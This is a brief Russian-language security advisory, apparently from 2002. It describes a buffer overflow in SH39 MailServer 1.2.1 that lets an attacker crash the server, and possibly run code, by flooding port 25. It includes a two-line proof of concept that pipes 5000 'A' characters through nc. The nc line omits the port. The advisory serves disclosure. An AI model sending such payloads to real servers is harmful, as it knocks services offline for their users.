Security Lab

DoS против MailServer SH39

Дата публикации:07.03.2002
Всего просмотров:1018
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: MailServer SH39 - SMTP/POP3 сервер для сред Microsoft Windows.

Представление необычного количества произвольных данных при соединении с 25 портом на MailServer хосте, может приводить к отказу в обслуживании и возможности выполнения произвольного кода из-за переполнения буфера (не подтверждено).

Уязвимость найдена в SH39 MailServer 1.2.1 Пример:
BUF=`perl -e '{print "A"x5000}'`
echo helo $BUF | nc 192.168.10.10

Ссылки: Источник